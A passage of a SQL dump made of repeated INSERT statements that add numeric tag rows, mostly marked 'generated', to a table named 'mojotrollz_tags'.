`table`, `type`, `value`, `comment`) VALUES (4132, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4132, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4133, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4133, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4138, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4138, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4139, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4139, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4140, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4140, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4142, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4142, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4143, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4143, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4144, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4144, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4146, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4146, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4147, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4147, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4150, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4150, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4151, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4151, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4154, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4154, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4155, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4155, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4156, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4156, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4158, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4158, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4159, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4159, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4160, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4160, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4161, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4161, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4163, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4163, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4164, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4164, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4165, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4165, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4166, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4166, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4167, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4167, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4168, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4168, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4169, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4169, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4170, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4170, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4171, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4171, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4172, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4172, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4173, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4173, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4175, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4175, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4177, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4177, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4180, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4180, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4181, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4181, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4182, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4182, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4183, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4183, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4184, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4184, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4185, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4185, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4186, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4186, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4187, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4187, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4188, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4188, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4189, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4189, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4190, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4190, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4191, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4191, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4192, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4192, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4193, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4193, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4194, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4194, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4195, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4195, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4196, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4197, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4197, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4198, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4198, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4200, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4200, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4201, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4201, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4202, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4202, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4203, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4203, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4204, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4204, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4205, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4205, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4208, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4208, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4209, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4209, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4210, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4210, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4211, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4211, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4212, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4212, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4213, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4213, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4214, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4214, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4215, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4215, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4216, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4216, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4217, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4217, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4218, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4218, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4219, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4219, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4220, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4220, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4221, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4221, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4222, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4222, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4223, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4223, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4225, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4225, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4226, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4226, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4228, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4228, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4229, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4229, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4230, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4230, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4231, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4231, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4232, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4232, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4233, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4233, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4234, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4234, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4235, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4235, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4236, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4236, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4240, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4240, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4241, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4241, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4242, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4242, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4243, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4243, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4244, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4248, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4248, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4249, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4250, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4250, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4251, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4252, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4253, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4254, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4254, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4255, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4255, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4255, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4256, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4256, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4257, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4257, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4257, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4258, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4258, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4259, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4259, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4260, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4260, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4262, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4262, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4263, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4264, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4265, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4265, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4266, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4267, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4267, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4268, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4269, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4270, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4271, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4272, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4273, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4273, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4274, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4274, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4274, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4275, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4275, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4275, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4276, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4278, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4278, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4278, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4279, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4279, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4279, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4280, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, 